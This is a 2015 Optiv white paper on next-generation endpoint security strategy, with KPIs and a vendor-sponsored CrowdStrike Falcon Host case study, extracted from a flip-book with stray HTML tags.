SOLUTION SPOTLIGHT
V1Uen
V1Uen
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
<strong>SOLUTION</strong> <strong>SPOTLIGHT</strong><br />
Next Generation Endpoint Strategy<br />
Rafal Los, Director, Solutions Research<br />
1
Introduction<br />
Enterprises continue to suffer from the growing cost of breaches,<br />
many of which originate at the endpoint, despite the compounding<br />
deployment of security tools to these corporate assets. According<br />
to the 2015 Ponemon Cost of Data Breach Study, the average cost<br />
of a data breach is now $3.79 million USD – that’s a 23 percent<br />
increase since 2013. Adversaries evolve and adapt even as security<br />
tools continue to remain static, causing significant challenges for<br />
defenders. The signature-focused, alert-centric reactive model for<br />
endpoint security tools must evolve beyond currently deployed<br />
capabilities to meet the growing productivity needs of the<br />
enterprise in an increasingly hostile environment.<br />
2
$3.79 million USD<br />
Average cost of a data breach<br />
3<br />
2015 Ponemon Cost of Data Breach Study
Identifying the<br />
Challenges<br />
Business Perspective<br />
The topic of corporate endpoint security<br />
is commonplace in the board rooms of<br />
enterprises large and small as the seemingly<br />
never-ending arms race with adversaries<br />
– whether they are activist, hacktivist or<br />
corporate or nation-state sponsored – yields<br />
breach after breach. Business leaders look<br />
to security executives to define security<br />
strategies that are operationally mature<br />
while continuing to allow the business to<br />
be agile and cost-effective, and to empower<br />
their workforce for maximum utility in<br />
increasingly hostile environments. As more<br />
security executives and professionals push<br />
their endpoint strategies into tighter alignment<br />
with business objectives, the delicate balance<br />
between productivity, cost and security benefit<br />
remain a challenge.<br />
Even more frustrating for business executives<br />
is that as security spending increases, it never<br />
seems to be enough. Executives are continually<br />
frustrated that, no matter how much money<br />
and how many people they invest in security,<br />
they can always be doing more. Adversaries<br />
are always a step ahead and a second faster –<br />
meaning breaches continue to make headlines<br />
in spite of the rise in security budgets.<br />
Endpoint security programs, which are key<br />
components of a holistic enterprise security<br />
strategy, are struggling to adapt to the rapid<br />
escalation in adversary activity and to protect<br />
the corporate endpoint in a more meaningful<br />
and effective way.<br />
Adversaries are winning<br />
Furthermore, from anecdotal evidence,<br />
business leaders are increasingly pushing back<br />
against the additive security model – hesitating<br />
to add more obstacles to end user productivity<br />
while loading down endpoints with yet another<br />
agent. As specialized tools are deployed by<br />
security for prevention, detection, response and<br />
recovery tasks, it is inevitable that endpoints<br />
slow down and system overhead increase. Even<br />
with the additions of new tools, endpoint<br />
systems continue to be compromised because<br />
there is a general lack of holistic integration<br />
between network, endpoint and various<br />
other security tools. Deployed technologies<br />
are inadequate and fail to address continually<br />
changing threats as adversaries evolve tactics<br />
and adapt quickly to static, pattern-based<br />
defenses. An evolution in endpoint security<br />
coupling actionable threat intelligence with<br />
pro-active attack detection is required.<br />
4
An Evolution on the Endpoints<br />
In the course of engaging with clients on<br />
security strategy engagements, the Office of<br />
the CISO has discovered that a vast majority<br />
of Fortune 1000 clients do not have adequate<br />
endpoint protection against even moderately<br />
advanced adversaries. Nearly all strategy<br />
roadmaps of these clients include a refresh of<br />
endpoint security tools with a heavy focus on<br />
advanced threats and mitigations.<br />
Overall, enterprises are looking to an evolution<br />
on the endpoints to provide better tools to<br />
decrease the impact of an infiltration or breach,<br />
decrease the dwell time of their attackers and<br />
improve response and remediation capabilities.<br />
Security Perspective<br />
The rise in high profile breaches come as no<br />
surprise to enterprise security professionals.<br />
As adversaries evolve and adapt, defenses have<br />
largely remained static even though more tools<br />
are added on a regular basis, especially to the<br />
endpoint. Security still depends on signatures<br />
and patterns, and continues to focus on<br />
malware, which is responsible for a mere 40<br />
percent of all breaches according to the 2013<br />
Verizon Data Breach Investigations Report<br />
(DBIR).<br />
The evolving adversary continues to be a<br />
problem for signature-based detection tools.<br />
Over the last decade these tools have attempted<br />
to keep pace with adversaries by writing more<br />
signatures faster, and broadening detection<br />
capabilities. This approach has created multiple<br />
problems. First, an adversary can adapt and<br />
evolve their attack patterns faster than tools<br />
providers can update signatures. Second,<br />
alerts from even a well-tuned detection<br />
platform can quickly overwhelm a security<br />
team’s ability to respond effectively. Finally,<br />
many security tools still focus on networkbased<br />
defenses while corporate assets become<br />
ever more mobile.<br />
Detection Methods<br />
Static indicators as a detection method<br />
of malicious activity continue to deliver<br />
diminishing results as complex adversaries<br />
move beyond malware. To repeat, according<br />
to the 2013 Verizon DBIR, only 40 percent<br />
of successful breaches were the result<br />
of malware. Adversaries are moving from<br />
dropping packaged malware as the primary<br />
method of attack to directly attacking browsers<br />
and operating systems using tools built into<br />
the operating system. These tools can include<br />
PowerShell or in-memory attacks which fully<br />
execute without ever writing to disk, thus<br />
traditional detection tools fail silently.<br />
Network detection tools offer scale, but lack the<br />
ability to protect the corporate assets as they<br />
become increasingly mobile. Relying solely<br />
on network-based defenses quickly proves<br />
problematic because many modern malware<br />
simply wait for the endpoint to leave the safety<br />
of the corporate perimeter before performing<br />
their tasks.<br />
The inability to quickly and effectively<br />
share critical security information puts<br />
the enterprise security team at a severe<br />
disadvantage. A restrictively myopic view<br />
makes defending against previously unknown<br />
threats extremely inefficient. To compound<br />
the situation, hiring and retaining top-level<br />
threat analysts continues to pose a challenge<br />
for even some of the largest enterprises. The<br />
result is a narrow perspective, inefficient use<br />
of available tools, and a continued struggle<br />
to defend against adversaries that adapt and<br />
overcome enterprise defenses.<br />
Only 40%<br />
of endpoint<br />
breaches are from<br />
Malware<br />
- 2013 Verizon Data Breach<br />
Investigationd Report<br />
5
Solution Analysis<br />
Strategy<br />
As part of a holistic, defense-in-depth strategy,<br />
the endpoint is a logical defensive control point<br />
for organizations that have maturing network<br />
controls and still struggle with intrusions.<br />
Minimizing dependence on reactive, alert-based<br />
detection where the security organization<br />
is notified post-facto of a security event is a<br />
necessary evolutionary step. But this evolution<br />
to a more mature model of pro-active detection<br />
of malicious activity known as hunting for<br />
indicative behaviors, is out-of-reach for many<br />
due to the shift in talent, processes, data and<br />
tools required. As security teams further<br />
mature and build out their defense-in-depth<br />
capabilities, they are creating three-fold<br />
endpoint strategies.<br />
First, there is a strong desire to incorporate<br />
threat intelligence purposefully into the<br />
endpoint security mechanism to continually<br />
understand and detect the latest known<br />
threats. Second is the evolution of signatures<br />
beyond post-facto indicators of compromise<br />
(IOCs) to a pro-active indicator model which<br />
seek to detect and stop unknown attacks earlier<br />
in the attack lifecycle. Finally there is a gradual<br />
move to push strategic functions, such as the<br />
ability to hunt, out to a center of excellence<br />
(CoE) approach. In many cases this translates<br />
to outsourcing this capability to a third party or<br />
centralized Security Operations Center (SOC).<br />
Operationally this decreases the volume<br />
of alerts a security organization ultimately<br />
faces and shifts the focus from detecting and<br />
remediating known threats to hunting and<br />
finding previously unknown threats. In this<br />
manner security teams can be more effective,<br />
focusing their workload on the truly significant<br />
security threats to the organization.<br />
Prerequisites<br />
In order to make this evolutionary journey,<br />
enterprise security teams must meet three<br />
basic criteria. The IT organization must have<br />
the ability to manage endpoints effectively<br />
while the security organization must possess<br />
the operational capability to triage events<br />
and perform appropriate incident response<br />
actions.<br />
Incident<br />
Response<br />
Manage Endpoints<br />
Triage<br />
Events<br />
6
As a prerequisite, the IT organization must<br />
have a well-operationalized endpoint<br />
management capability to identify, deploy<br />
and manage software components of the<br />
endpoint. The security organization, while not<br />
directly responsible for these tasks, relies upon<br />
the ability to utilize this capability through an<br />
automated, on-demand platform to provide<br />
context to security events for prioritization.<br />
This collaboration highlights the necessary<br />
interdependency between enterprise security<br />
and enterprise IT, and emphasizes solid<br />
fundamentals as a baseline requirement for<br />
any advanced capabilities.<br />
Additionally, enterprise security must have<br />
or must be developing the operational<br />
capabilities – including processes and human<br />
resources as necessary – to triage the events.<br />
Endpoint security monitoring will then<br />
identify and perform requisite actions. Without<br />
the ability to triage and properly respond, even<br />
advanced endpoint tools are relegated to bestguess<br />
based on a combination of signatures<br />
and statistical models which don’t take into<br />
account an enterprise’s unique operational and<br />
resource constraints.<br />
Operational Guidance<br />
Strategic<br />
Endpoint security must be considerate of<br />
corporate endpoint operating parameters,<br />
meaning strategy must take into account<br />
the way that endpoints are used to enable<br />
and support the business.<br />
• Minimal impact during deployment,<br />
operation and maintenance – Endpoint<br />
security must limit the impact on the<br />
productivity of the endpoint. Reboots,<br />
resource utilization and compatibility<br />
concerns must be tested and vetted before<br />
standardizing on a tool. Most endpoints are<br />
already overloaded with security agents (from<br />
disk encryption to anti-virus and e-discovery<br />
for starters) so adding an additional agent will<br />
generally receive push-back from operations<br />
teams. Supplantive technologies are generally<br />
preferred with minimal impact to the<br />
endpoint’s resources and productivity high on<br />
the requirements list.<br />
• Remote supportability – Endpoint security<br />
tools must be as operational “outside the<br />
network” as they are inside. Tools which<br />
only function fully when inside a defined<br />
corporate perimeter risk leaving the endpoint<br />
exposed, as many endpoint devices are mobile<br />
and operate in increasingly diverse and<br />
hostile environments.<br />
• Comprehensive coverage – The<br />
expectation that all corporate endpoints<br />
will be homogenous is unrealistic in today’s<br />
enterprise as Windows, Mac OS, Android,<br />
iOS and others jockey for share of corporate<br />
endpoints. Endpoint tools should provide<br />
coverage of an enterprise’s full environment<br />
from a single, centralized tool.<br />
Tactical<br />
An endpoint security solution requires<br />
operational and tactical support to be<br />
effective, including the following:<br />
• Contextual analysis – Endpoint tools<br />
which rely only on hashes and patterns<br />
fall victim to the malware arms race that is<br />
created as adversaries easily mutate their<br />
payloads to bypass detection. Endpoint<br />
security tools today must use a combination<br />
of pattern detection and anomaly analysis<br />
while incorporating threat intelligence<br />
where practical. Furthermore, tools that<br />
have the capabilities to leverage multiple<br />
endpoint environments through anonymized<br />
information sharing or cloud services have an<br />
advantage over local only approaches.<br />
• Security Operations Center –To effectively<br />
manage security of the enterprise holistically,<br />
a security operations center must be set<br />
up to provide a clearing house for inbound<br />
intelligence, tooling, analysis and response<br />
for escalated security events. Endpoint<br />
security must have effective integration<br />
7
into this core security operations function,<br />
being able to both consume external and<br />
internal intelligence and collaborate on event<br />
prevention, detection, response and recovery.<br />
Additionally, the advanced capability to move<br />
beyond signatures and to “hunt” becomes a<br />
crucial function of the SOC.<br />
• Response and remediation support –<br />
Enterprise endpoints should be expected<br />
to experience attack on a regular basis. The<br />
endpoint security suite must lend itself to<br />
integration with response and remediation<br />
support to continuously and quickly identify<br />
and shut down incidents before they<br />
become catastrophic – a concept known<br />
as continuous response. It is beneficial if<br />
endpoint security tools can perform remote<br />
data collection and remediation procedures<br />
to minimize the amount of high-touch<br />
interactions a security incident response<br />
organization has with the endpoints. This<br />
minimizes negative impact to productivity<br />
and potentially the impact to cost of incident<br />
response as well.<br />
The endpoint security suite<br />
must lend itself to integration<br />
with response and remediation<br />
support to continuously and<br />
quickly identify and shut down<br />
incidents before they become<br />
catastrophic – a concept known<br />
as continuous response.<br />
Capabilities *<br />
• Decreased impact of infiltration – With<br />
the addition of external threat intelligence<br />
and decreased reliance on signature-based<br />
detection, it becomes possible to detect<br />
threats earlier in the attack lifecycle. The goal<br />
is to identify and stop attacks in progress<br />
where possible and thereby reduce the<br />
impact a successful infiltration may have on<br />
the organization.<br />
• Decreased dwell time of adversaries – As the<br />
security organization develops the capability<br />
to detect malicious activity faster, it decreases<br />
the amount of time that an adversary will<br />
have to move around within the victim’s<br />
networks after a successful infiltration. This<br />
diminishes effectiveness of the adversary in<br />
achieving their objectives.<br />
• Improved response and remediation<br />
capabilities – A key result of improved<br />
visibility and comprehensive profiling of an<br />
adversary is being able to tell the difference<br />
between an opportunistic malware infection<br />
(generic) and a determined adversary<br />
(persistent). Knowing the threat type leads<br />
to better prioritization, more purposeful<br />
response, and more complete remediation.<br />
Furthermore, endpoint tools should play a<br />
pivotal role in incident response procedures,<br />
often being at the focus point of the incident.<br />
Mature endpoint tools should provide<br />
operational visibility through data and<br />
telemetry and response capabilities through<br />
containment, remediation and remoteresponse.<br />
*For clarity, it is necessary to note here that<br />
what is being discussed is an evolutionary<br />
step beyond what is commonly referred to as<br />
traditional anti-virus endpoint tools.<br />
8
Measure and Improve<br />
As with any undertaking, it is extremely<br />
important to set goals and measure relative<br />
distance to these goals. Endpoint security may<br />
directly impact end user productivity and thus<br />
must be carefully controlled and measured<br />
for that business impact. Measuring impact<br />
of a program item, such as endpoint security,<br />
to pre-defined and business aligned goals and<br />
objectives provides concrete evidence of such a<br />
program.<br />
When thinking about endpoint security, one<br />
must consider Key Performance Indicators<br />
(KPIs) such as workload optimization,<br />
productivity gains, incident reduction and<br />
proactive detection.<br />
It is important to establish a set of goals before<br />
embarking on an endpoint security program<br />
or project. What are the key things that the<br />
program should accomplish? What is the state<br />
of those things now and can it be measured?<br />
How much of a difference is an investment<br />
in endpoint security tools expected to make?<br />
These are all questions that should have<br />
formulas for answering them as the program<br />
progresses.<br />
Possible Key Performance Indicators (KPIs)<br />
include—<br />
• Time-to-detection – A quantitative way to<br />
demonstrate the value of a next-generation<br />
endpoint strategy is to compare it against<br />
existing tools in similar situations for the<br />
detection of threats. Traditional pattern-based<br />
solutions will have a significantly longer<br />
time to detection, especially on previously<br />
unknown threats versus next-generation<br />
solutions that rely on a much richer set of<br />
indicators.<br />
can quickly help demonstrate value by<br />
showing the positive impact of the solution<br />
on lost productivity and cumulative times to<br />
remediation.<br />
• Malware-to-incident ratio – Measuring for<br />
the deceased impact of an infiltration, this KPI<br />
measures the number of malware “catches”<br />
against the number of incident response<br />
actions generated for those catches. We look<br />
for a drop in the number of incidents even as<br />
malware rates continue to rise, reaffirming<br />
that a successful malware infiltration onto an<br />
endpoint or system does not guarantee victory<br />
for the adversary or a requirement for an<br />
incident responder.<br />
• Attacker dwell time – This KPI measures the<br />
time from when a piece of malware or attacker<br />
is identified as first infiltrating a system to<br />
when that attacker or piece of malware is<br />
successfully removed from the endpoint.<br />
What we are looking for is a systemic decrease<br />
in how long an attacker has free reign on our<br />
endpoints before they are caught and ejected.<br />
• Incident close rate – One of the most<br />
important KPIs that endpoint tools support<br />
is the rapid remediation and closure rate of<br />
incidents. With better tools, responders can<br />
more quickly get inside the attacker’s kill<br />
chain and stop the attack. One good way of<br />
identifying improvement is the number of<br />
incidents a responder can close in a shift.<br />
Measuring and Improving<br />
Incident close rate<br />
Time-to-detection<br />
• Time-to-remediation – One of the key value<br />
drivers of a next-generation endpoint solution<br />
is the additional capabilities that serve to<br />
decrease the time it takes to remediate a<br />
potential issue. The ability to compare existing<br />
remediation times using current endpoint<br />
tools against a next-generation solution<br />
Attacker dwell time<br />
Malware-toincident<br />
ratio<br />
Time-to-remediation<br />
9
Case Study in<br />
Next Gen Endpoint<br />
Organizational Profile<br />
The organization featured in this case study<br />
is a global financial services provider with<br />
a diversity in assets, products and global<br />
presence. In order to adapt to a growing threat<br />
climate, the organization sought to provide<br />
additional layers of security beyond traditional<br />
security tools such as endpoint anti-virus.<br />
The move to a next-generation endpoint<br />
was seen as strategic and necessary to detect<br />
sophisticated adversaries inside the perimeter<br />
to globally reduce risk to the enterprise.<br />
The globally diverse corporate endpoint<br />
infrastructure necessitated a solution that can<br />
enable the security team to identify previously<br />
unknown threats faster – before the adversary<br />
can achieve their objectives.<br />
Challenges<br />
Business Perspective<br />
and risk-based models for dealing with<br />
attackers. Even though malware continues<br />
to be a problem for the enterprise, it is the<br />
adversary that is proving truly worrisome.<br />
The determined attackers that take the time<br />
to understand the enterprise – often better<br />
than it understands itself – and custom-craft<br />
attacks that bypass existing signature-based<br />
threats force the system to fail silently. In<br />
these scenarios, attacks are missed and the<br />
enterprise often finds out about a high-profile<br />
breach and exfiltration of critical assets from a<br />
third party or worse, the media.<br />
At the same time, business leadership is<br />
pushing hard to keep the enterprise safe<br />
from both known and unknown threats.<br />
Threats that are currently unknown such as<br />
nation-state adversaries, organized crime or<br />
industrial espionage are both well-funded and<br />
persistent and adapt their attacks to the target.<br />
Business leadership needs accountability, costcontainment<br />
and certainty in the tools the<br />
security organization is utilizing.<br />
Businesses have developed mathematical<br />
10
11<br />
Technology Perspective<br />
As adversaries evolve, traditional endpoint<br />
security approaches are simply not keeping<br />
pace. Making the assumption that determined<br />
adversaries will eventually gain access into the<br />
network, it becomes important to understand<br />
their methods, movements and actions to<br />
effectively determine a course of action.<br />
Existing tools were inadequate for this task, so<br />
an alternative was sought.<br />
At the core of the problem was the inability to<br />
detect lateral movement from compromised<br />
endpoints. As a result, adversary dwell time<br />
was unknown – but assumed high – and<br />
the enterprise security team’s visibility was<br />
extremely limited. When a compromised<br />
endpoint was discovered, there were no<br />
immediately available tools to aide in<br />
determining what actions that compromised<br />
endpoint may have taken, where an attack<br />
originated (if not at that endpoint), and the<br />
scope of the resultant breach. Furthermore,<br />
adversaries that did not utilize malware for the<br />
attack were not being detected at all.<br />
Solution Approach<br />
Solution Chosen<br />
To alleviate the enterprise security team’s<br />
challenges, CrowdStrike Falcon Host was<br />
chosen. Selected for its ability to detect<br />
unknown unknowns as well as pattern-defined<br />
threats, Falcon was utilized on both servers<br />
and workstation endpoint systems. Falcon<br />
was selected for its unified visibility on both<br />
workstation and server endpoints, and because<br />
it directly incorporated CrowdStrike’s extensive<br />
threat intelligence knowledgebase into the<br />
product.<br />
Desired Capabilities<br />
There were five key factors in the selection of<br />
CrowdStrike Falcon Host.<br />
1. Unified server and workstation visibility<br />
from a single agent and management<br />
console<br />
2. Forensic insight (hunting capabilities)<br />
3. Ease of deployment throughout the<br />
environment<br />
4. Superior user interface of the management<br />
console<br />
5. Lightweight nature of the endpoint agent<br />
The capability to deploy a single, unified<br />
agent across servers and workstations<br />
decreases the amount of work an operations<br />
team would need to do to package the tool<br />
for deployment – thus making this feature<br />
incredibly underrated and critical to successful<br />
deployment. Because the agent is lightweight,<br />
deployment was refreshingly low-stress across<br />
a diverse environment, primarily based on<br />
Linux and Windows endpoints and does not<br />
consume memory, CPU or disk resources<br />
to cause end user productivity issues. In<br />
large environments where endpoints are in<br />
what feels like a continuous update cycle,<br />
the lightweight nature of the Falcon agent<br />
definitely aided its deployment success.<br />
Security tools, not unlike most other IT tools,<br />
can succeed or fail based on the management<br />
console or dashboard. Management consoles<br />
that are designed with product use cases<br />
in mind streamline workflow and optimize<br />
use of precious human resources. When<br />
investigating a potentially critical security<br />
issue within the environment, a clean, simple,<br />
well-designed user interface can mean the<br />
difference between stopping an adversary and<br />
spending an afternoon trying to find the right<br />
information to make the decision.<br />
Additionally, the advanced ability to “hunt” –<br />
or query system parameters and data in near<br />
real-time – becomes pivotal when looking<br />
beyond pattern detection. As adversaries<br />
evolve it will continue to be more and more<br />
critical that enterprise security organizations<br />
move beyond pattern-based threat recognition<br />
and malware signatures. Malware-free<br />
intrusions which use custom-crafted attack<br />
vectors are likely to continue to increase,<br />
thereby making tools that aid the human<br />
analyst in detecting system-based anomalies<br />
that are indicators of compromise that much<br />
more indispensable.
12<br />
Solution Components<br />
• CrowdStrike Falcon Host for servers and<br />
workstations<br />
Operationalizing<br />
The most critical task for any piece of security<br />
component deployed in an enterprise setting<br />
is the operationalization of that component.<br />
Taking a tool and integrating it into the<br />
workflow and culture of an organization<br />
cannot be overstated. That being the case,<br />
the CrowdStrike solution has truly become a<br />
partner with this organization’s security team.<br />
• Executive management allocated<br />
approximately one quarter for full rollout and<br />
operational efficiency, and the CrowdStrike<br />
team was able to achieve deployment and<br />
operational stability within an amazing two<br />
days.<br />
• The team deployed to 75,000 desktop<br />
endpoints and 10,000 servers with minimal<br />
operational overhead, no downtime and no<br />
issues.<br />
• This tremendous success has led the CIO<br />
of the organization to hold this specific<br />
deployment as a “gold standard” for all future<br />
deployments of security tools.<br />
The full integration of the Falcon Host Next-<br />
Generation Endpoint required deployment<br />
into the standard images the organization was<br />
deploying to ensure it was installed by default.<br />
This was achieved quickly at both the desktop<br />
and server level as success with the desktop<br />
team was recognized and adopted quickly by<br />
the server organization. Additionally, training,<br />
playbook creation (operational guides)<br />
and hunt queries were rapidly developed<br />
and deployed through the support of the<br />
CrowdStrike team to ensure rapid uptake.<br />
As part of the operational strategy of the<br />
Falcon Host NGE, the organization brought<br />
on board new headcount to begin to leverage<br />
the newly deployed capabilities. The new<br />
capabilities to hunt required specialized<br />
skills and thus a team of five new analysts<br />
were brought on board to fulfill that<br />
function. The simplicity and ease-of-use of<br />
the management console facilitated rapid<br />
adoption from training to finding over 200<br />
new and previously undiscovered issues in<br />
the environment.<br />
Where CrowdStrike really stands apart<br />
from the competition as a partner is in the<br />
integration into the security operations<br />
function.<br />
• The security team truly partnered with<br />
CrowdStrike’s Security Operations Center<br />
(CSOC) – who in addition to hunting for<br />
unknown threats also provides direct<br />
additional operational feedback and support<br />
on next steps for issues encountered.<br />
• This direct relationship with CrowdStrike’s<br />
talented and knowledgeable CSOC team<br />
provides guidance, leadership and directly<br />
actionable information unavailable from<br />
other next-generation endpoint providers<br />
due to their wealth of threat intelligence<br />
capabilities.<br />
Strategic Benefits of<br />
CrowdStrike Falcon Host<br />
Addressing complex security challenges<br />
often requires complicated implementations,<br />
extensive deployment cycles, training and<br />
process building. Utilizing CrowdStrike Falcon<br />
Host, the organization in this case study was<br />
able to not only deploy rapidly with minimal<br />
impact, but was also able to quickly realize<br />
value from the solution by detecting attacks<br />
that other tools were missing. The value that<br />
is derived from a new security tool which<br />
requires minimal organizational friction to<br />
operationalize should not be overlooked.<br />
From a strategic perspective, the benefits<br />
of the CrowdStrike Falcon Host solution<br />
include the ability to identify sophisticated<br />
and complex adversaries which traditional<br />
security tools miss. Adversaries who take<br />
the time to understand and design attacks<br />
against your environment won’t be caught<br />
with the tools deployed today. They require an<br />
advanced toolkit which can not only identify<br />
previously known patterns but also assist with
the discovery and assessment of previously<br />
unknown attacks. This ability to detect and<br />
identify the unknown unknowns adds value<br />
to organizations that have already optimized<br />
signal-to-noise in their reporting dashboards<br />
and require the capability to detect and respond<br />
to complex attacks. For this organization, the<br />
CrowdStrike Falcon Host tool is a key partner<br />
in their long-term strategic security program<br />
and their continued development of advanced<br />
detection and response capabilities.<br />
Results and Measured<br />
Improvement<br />
The degree of success of any security program<br />
or initiative can be measured as the ratio<br />
of security benefit against the additional<br />
business interference created. By this measure<br />
the CrowdStrike deployment has been a<br />
true success. With a two-day deployment<br />
cycle across 75,000 workstations and 10,000<br />
servers, including training and initial use case<br />
creation while generating no negative end<br />
user or operational impact, measured against<br />
the discovery of over 200 new security issues<br />
previously undetected by other security tools,<br />
the Falcon Host NGE achieved rapid value with<br />
minimal to no interference. These results speak<br />
for themselves.<br />
As the security team continues to use the<br />
toolset, they measure the amount of new<br />
attacks and adversary actions that are caught<br />
through the Falcon Host NGE. This net-new<br />
discovery metric clearly shows the value that<br />
this solution brings to the organization.<br />
to protect key enterprise endpoint assets to<br />
the point where these network-based threat<br />
mitigation tools are unnecessary.<br />
The security team believes<br />
the Falcon Host solution<br />
is sufficient to protect<br />
key enterprise endpoint<br />
assets to the point where<br />
these network-based<br />
threat mitigation tools are<br />
unnecessary.<br />
This portion of the spotlight is a vendor-sponsored<br />
case study. Content and views set forth in this<br />
portion of the spotlight are those of the vendor<br />
and/or the vendor’s customer. Optiv does not<br />
endorse, support, represent or guarantee the<br />
completeness, truthfulness, accuracy or reliability<br />
of any content or views in this portion of the<br />
spotlight, and Optiv disclaims responsibility, and<br />
will not be liable for, such content and views. Optiv<br />
does not endorse any specific software, hardware,<br />
services or solutions.<br />
One tremendous advantage to the CrowdStrike<br />
solution has become the potential for costsavings<br />
by removal of redundant tools. As the<br />
value of the next-generation endpoint solution<br />
becomes fully realized, it is possible that the<br />
dependence on network-based threat detection,<br />
sandboxing and mitigation tools can be<br />
reduced to the point where many of these tools<br />
can simply be discontinued. The security team<br />
believes the Falcon Host solution is sufficient<br />
13
Lessons Learned<br />
While there is no end in sight to the arms race between attackers and<br />
defenders, the tools at the disposal of enterprise security professionals are<br />
dramatically improving.<br />
• In the defender’s toolbox, the Next-Generation Endpoint (NGE) category<br />
of tools is proving that an evolution in the way that endpoint security is<br />
handled is both necessary and available.<br />
• The next-generation of endpoint tools are supporting the operational goals<br />
of decreasing both dwell time of adversaries, and the impact of their actions<br />
while adding to the response and remediation capabilities directly.<br />
• The direct support of incident response capabilities helps scale the most<br />
precious resource – humans.<br />
For more information about next generation endpoint strategy, please contact Optiv<br />
Solutions Research and Development SolutionsResearch@optiv.com<br />
14
15
1125 17th Street, Suite 1700<br />
Denver, CO 80202<br />
800.574.0896<br />
www.optiv.com<br />
Optiv is the largest holistic pure-play cyber security<br />
solutions provider in North America. The company’s diverse<br />
and talented employees are committed to helping<br />
businesses, governments and educational institutions<br />
plan, build and run successful security programs<br />
through the right combination of products, services<br />
and solutions related to security program strategy,<br />
enterprise risk and consulting, threat and vulnerability<br />
management, enterprise incident management, security<br />
architecture and implementation, training, identity<br />
and access management, and managed security.<br />
Created in 2015 as a result of the Accuvant and FishNet<br />
Security merger, Optiv is a Blackstone (NYSE: BX) portfolio<br />
company that has served more than 12,000 clients<br />
of various sizes across multiple industries, offers an<br />
extensive geographic footprint, and has premium partnerships<br />
with more than 300 of the leading security<br />
product manufacturers. For more information, please<br />
visit www.optiv.com.<br />
© 2015 Optiv Security Inc. All Rights Reserved.<br />
7.15 | F1<br />
16